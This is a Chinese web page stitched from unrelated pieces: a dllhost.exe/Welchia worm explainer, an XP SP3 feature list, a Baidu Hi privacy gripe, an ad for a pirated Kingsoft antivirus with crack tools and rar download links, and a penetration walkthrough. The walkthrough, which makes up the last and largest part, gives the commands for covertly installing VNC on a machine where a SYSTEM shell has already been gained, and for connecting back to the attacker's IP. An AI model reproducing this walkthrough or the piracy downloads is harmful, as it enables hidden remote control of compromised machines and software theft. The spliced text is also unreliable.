dllhost.exe 解释
　　
　　dllhost.exe是什么？
　　dllhost.exe是运行COM+的组件，即COM代理，运行Windows中的Web和FTP服务器必须有这个东西。
　　
　　什么时候会出现dllhost.exe？
　　运行COM+组件程序的时候就会出现。例如江民KV2004
　　
　　冲击波杀手又是怎么一回事？
　　冲击波杀手借用了dllhost.exe作为进程名，但是由于Windows不允许同一个目录下有同名文件的存在，因此，冲击波杀手把病毒体：dllhost.exe放到了C:\Windows\System32\Wins目录里面（Windows 2000是C:\WINNT\System32\Wins，全部假设系统安装在C盘），但是真正的dllhost.exe应该放 在C:\Windows\System32（Windows 2000是C:\WINNT\System32）
　　
　　换句话说就是：冲击波（Worm.WelChia）为了迷惑用户，避免病毒的执行体被进程管理器终止，采用了dllhost.e xe这个和Windows组件一样的名字，但是并不是说进程里面出现dllhost.exe就等于感染了worm.welchi a
　　
　　再看看这里的FAQ吧
　　
　　第一个误区————进程出现Dllhost.exe就等于中了病毒
　　Dllhost.exe是系统文件，但是进程里面出现Dllhost.exe进程不等于中了病毒
　　
　　第二个误区————一见Dllhost.exe进程就杀死
　　其实这样做是不好的。很多程序都需要Dllhost.exe，例如KV2004实时监控运行的时候或IIS在解析一些ASP文件 的时候，进程中都会出现Dllhost.exe
　　
　　之所以大家恐惧Dllhost.exe进程，恐怕是由于冲击波（杀手）的问题。
　　其实冲击波（杀手）只不过采取了一个偷梁换柱的方法。因为任务管理器里面无法看出进程中exe文件的路径，所以让大家在分析问题 的时候出现一些偏差。
　　
　　感染冲击波（杀手）的典型特征不是进程中出现Dllhost.exe，而是RPC服务出现问题（冲击波）和System32\w ins目录里面出现svchost.exe和dllhost.exe文件（冲击波杀手）。注意路径！！
　　
　　那么，Dllhost.exe是什么呢？Dllhost.exe是 COM+ 的主进程。正常下应该位于system32目录里面和system32\dllcache目录里面。而system32\win s目录里面是不会有dllhost.exe文件的。

      随着发布Windows XP SP3日子的临近，微软已在其Microsoft.com网站上发布了一份名为Windows XP Service Pack 3 Overview的文档。在此份文档中，微软总结并罗列了先前XP SP3 beta版的一些新特性，并囊括了即将发布正式版的新特性，现罗列如下。

　　新版本将出现的新功能：

　　网络方面：黑洞路由探测、网络访问保护(NAP)

　　安全方面：资格认证安全服务提供者(CSSP)、更详细的安全选项控制面板、增强的管理员安全和服务策略入口、内核模式加密模块

　　安装方面：Windows产品激活保护

　　先前版本的功能总结：

　　Windows图像组件(WIC)

　　微软控制台MMC 3.0

　　微软核心XML服务MSXML 6.0

　　安装服务Windows Installer 3.1.4000.2435

　　后台智能传输服务BITS 2.5

　　数字认证管理服务(DIMS)

　　用于Windows XP/Server 2003的IPsec简单策略升级

　　对等网络名称解析协议PNRP 2.1

　　Wi-Fi保护访问WPA 2

　　26日下午，已经拥有百度HI账号的用户已经可以邀请朋友加入，百度产品副总裁俞军表示：“从去年开始，我们就社区 用户之间沟通的需求，陆续作了大量用户调研和访谈，发觉百度用户之间私下的、即时的沟通需求越来越 迫切，于是便考虑作自己的IM产品。”

　　但在使用百度HI的过程中，我发现一个比较严重的问题，在百度内测的时候，很多百度员工建立了HI群，HI群中可以看到创建者(即百度员工的帐号和个人填写的信息)的部分资料，而这些资料或许会引起猎头与竞争对手的关注。

　　俞军认为，百度IM的核心价值在于有机地贯穿整合了百度的主要产品线和服务，优化了用户体验。他表示，百度期望IM成为百度各业务的粘着剂，达成用户在百度产品之间的无缝体验，提升社区粘性。但就目前来看，百度HI群在测试的过程中，许多员工都把自己的真实信息写在其中，如果被QQ、UC的HR看到了这些信息，相信一定会开怀大笑的。本人测试HI群号10000为开始，目前所建立的群中大部分为百度员工创建，而通过群中的创建者帐号可以获得创建者的信息，如果各大网站的HR是有心人的话，通过这种手段来挖墙角也是一个新创意。当然了，如果大家想提高网站权重的话不妨通过HI群联系一下百度的员工，不知百度HI能否超越QQ，让我们拭目以待吧。

本版软件绝对可以升级，如果你现在已经使用别的杀毒软件，强烈建议你同样下载备份，以防你现在软件失效后无软件可用！不一样的杀毒软件，不一样的效果！尽在金山毒霸2008终身升级版V9.0！

简介：金山毒霸2008终身升级版V9.0是在金山毒霸2008基础上制作而成，使用官方金山毒霸2008，没有修改任何源代码！我们保证金山毒霸2008终身升级版在2008年全年有效！金山毒霸2008杀毒效果在金山毒霸2007的基础上提高了300%，2008年在国内10大软件评比中名列第一!

【说明】下载包内具有工具： 【下载包内有20组正版通行证，随心升级】
1、【免杀版】精灵被金山毒霸视为病毒，现在最新的免杀版精灵面世！
2、【更新了】精灵升级的演示动画，现在是金山毒霸2008终身升级版的升级动画！(新)
3、【增加了】免显充值提示的补丁！
4、【增加了】第四版升级功能，自动升级！
5、【增加了】烟桥公告器，当你不好升级的时候，你打开看看，你就一定能升级，公告器提代最新升级资讯！(2008年最新)
6、【增加了】烟桥升级精灵V3+、按钮突破专家2.0！(新)
7、【提供了】烟桥版的通行证，20组正版通行证，随心升级！
8、【提供了】烟桥社区首页http://www.yanqiao.com/每日更新几个通行证,从2007年3月一直持续到现在了！(新)
9、【内置了】本安装包里面有一张升级图片，这一张图片，你一看，就知道升级的原理！(新)

【下载包内有20组正版通行证，随心升级】 六选一，任意下载其中之一【强烈要求你用迅雷下载】！

下载地址1：http://www.duba2008.cn/duba2008.rar　【把路径复制到迅雷中下载，速度极快】
下载地址2：http://www.139cha.com/duba2008.rar　【把路径复制到迅雷中下载，速度极快】
下载地址3：http://www.at0511.com/duba2008.rar　【把路径复制到迅雷中下载，速度极快】
下载地址4：http://www.139cha.com/2008.rar　　　【把路径复制到迅雷中下载，速度极快】
下载地址5：http://www.duba2008.cn/2008.rar　　 【把路径复制到迅雷中下载，速度极快】
下载地址6：http://www.at0511.com/2008.rar　　 【把路径复制到迅雷中下载，速度极快】

这篇文章是为渗透而写的，当初获得了一个Systemm权限的Shell，但是因为目标机器有种种限制，只开80、443等端口，其它端口打不开，这个时候就需要一个GUI交互界面的程序来控制这台机器了，所以给这台机器安装VNC将是一个不错的选择。

准备
准备工作：需要一个交互控制环境，最好获得对方Systemm权限的Shell，下载VNC-3.3.7版本，剥离远程安装所需的文件。在一台机器安装VNC并注册为系统服务，设置好VNC密码，剥离我们所需要的远程安装的文件。
C:\WINNT\Systemm32>dir "C:\Program Files\RealVNC\VNC"
驱动器 C 中的卷没有标签。
卷的序列号是 9464-50C4

C:\Program Files\RealVNC\VNC 的目录

2004-07-19 12:18 .
2004-07-19 12:18 ..
2003-02-19 10:16 61,440 othread2.dll
2004-06-27 14:26 1,174 VNC.reg
2004-07-19 01:16 57,344 VNChooks.dll
2004-07-19 01:12 307,200 winVNC.exe
4 个文件 427,158 字节
2 个目录 3,266,203,648 可用字节
这里我们只需要VNChooks.dll、WinVNC.exe、Othread2.dll三个文件，然后从注册表中导出VNC的设置VNC.reg。
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL]
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"PortNumber"=dword:00000000
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"Password"=hex:98,e6,55,1f,82,42,48,9e
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000

TIPS：如果你要渗透的系统是XP，那么就要在XP上安装VNC并按照上面的步骤剥离VNC远程安装所需文件。

实践
目的是要验证VNC远程安装与正向连接，验证VNC反向连接。目标IP：xxx.xxx.xxx.xxx，已获得一个System Shell，现在我们在目标系统上下载并安装VNC：
C:\WINNT\Systemm32>ver
ver
Microsoft Windows 2000 [Version 5.00.2195]
C:\WINNT\Systemm32>whoami
whoami
NT AUTHORITY\SYSTEMM

C:\WINNT\Systemm32>riv //解压VNC
riv
Extracting from C:\WINNT\Systemm32\riv.exe
Create By Kaka
Mail:Kaka@0x557.org
Homepage:http://www.0x557.org

Extracting othread2.dll OK
Extracting VNC.reg OK
Extracting VNChooks.dll OK
Extracting winVNC.exe OK
All OK
然后在命令行下安装VNC：
C:\WINNT\Systemm32>winVNC –install //安装。删除为WinVNC -remove
winVNC -install
C:\WINNT\Systemm32>c:\winnt\regedit /s VNC.reg //把VNC注册表内容导入，即配置、密码等
c:\winnt\regedit /s VNC.reg
C:\WINNT\Systemm32>net start winVNC //启动VNC服务
net start winVNC
VNC Server ……（乱码，内容是安装成功）
VNC Server ……（乱码，内容是安装成功）

C:\WINNT\Systemm32>netstat -an | find ":5800" //查看VNC安装成功与否。
netstat -an | find ":5800"
TCP 0.0.0.0:5800 0.0.0.0:0 LISTENING
C:\WINNT\Systemm32>
安装成功后，我们直接测试VNC的正向连接功能，连上去，如图1所示：

图1
连接成功。请注意看图片的右下角，并没有VNC的图标出现。似乎很顺利，接下来应该测试VNC的反向连接，按照VNC的帮助，反向连接格式应该是这样的：
IP：开VNCviewer.exe的监听模式 VNCviewer.exe –listen 默认监听本机的5500端口。
WinVNC –connect VNCviewer监听的IP
问题在这里出现了，耗费了我几个小时，晚上8点到第二天凌晨1点左右都是在搞这个反向连接，痛苦。下边是我的分析思路：运行中的WinVNC也就是安装好VNC后，系统启动的VNC程序：
C:\WINNT\Systemm32>pulist | find "winVNC.exe"
pulist | find "winVNC.exe"
Process PID User
winVNC.exe 3104 NT AUTHORITY\SYSTEMM //注意启动winVNC的系统身份
我在SYSTEMM的Shell环境下输入：
WinVNC –connect myip
以为会在自己开了VNCviewer监听的机器上出现VNC反连过来的得GUI界面，结果确是失望的。查看远程机器的VNC进程如下：
C:\WINNT\Systemm32>winVNC -connect 222.65.110.236
winVNC -connect 222.65.110.236

C:\WINNT\Systemm32>pulist | find "winVNC.exe"
pulist | find "winVNC.exe"
winVNC.exe 3104 NT AUTHORITY\SYSTEMM //注意启动winVNC的系统身份
WinVNC.exe 2392 NT AUTHORITY\SYSTEMM
不能反向连接，这不是我想要的，因为我确实是实验过VNC是可以反连的，而且是从内网连接到外网的机器。继续看资料，在本机实验，问题出在反向连接是可以连接到远程开VNCviewer监听的机器，但是在这个有System权限的Shell下却怎么也反向连接不过来！
百思不得其解，随手在本机敲上VNC反连的命令，看着远程计算机出现我的机器桌面，突然想到反连不成功会不会跟这个有关系？反连需要系统某个用户的身份，及其配置?使用Runas看看（允许用户用其他权限运行指定工具和程序，而不是用户当前登录提供的权限）。
C:\WINNT\Systemm32>runas /profile /env /user:FILE-PRINT\edu "winVNC -connect 222.
65.110.236"
runas /profile /env /user:FILE-PRINT\edu "winVNC -connect 222.65.110.236"
……（看不懂的乱码）
C:\WINNT\Systemm32>pulist | find "winVNC.exe"
pulist | find "winVNC.exe"
winVNC.exe 3104 NT AUTHORITY\SYSTEMM
利用Runas使用这台电脑的一个用户身份执行VNC反向连接失败，提示返回消息韩文没有看懂，也没有继续追究下去，因为我又找到一个别的工具Runasex.exe。
C:\WINNT\Systemm32>runasex edu edu winVNC “-connect 222.65.110.**”
runasex edu edu winVNC "-connect 222.65.110.**"
winVNC Execute Succussifully.
C:\WINNT\Systemm32>netstat -an | find ":5500"
netstat -an | find ":5500"
TCP 211.232.169.**:2503 222.65.110.**:5500 ESTABLISHED
Local
C:\>netstat -an | find ":5500"
netstat -an | find ":5500"
TCP 0.0.0.0:5500 0.0.0.0:0 LISTENING
TCP 10.0.0.100:5500 211.232.169.**:2503 ESTABLISHED

在我本机出现了期待已久的VNC远程连接界面！成功！
最后得出结论：WinVNC反连的时候，必须要被执行一次，即系统有一个VNC的运行进程，反连在此基础上运行才能成功。而且WinVNC的反连必须要以一个用户的身份来连接System权限不可以启动WinVNC的反连。更多的功能需要自己动手去实践，如有问题欢迎与我讨论。

参考文章：
http://www.digitaloffense.net/docs/Remote.VNC/remote_installation.txt Remote VNC Installation
http://www.tburke.net/info/misc/VNC_remote.htm How to install VNC on a remote PC
http://www.darkage.co.uk/VNC/howtos/fromcmdshell.htm Install VNC from the command shell
http://www.netxeyes.org/VNC.html VNC的远程安装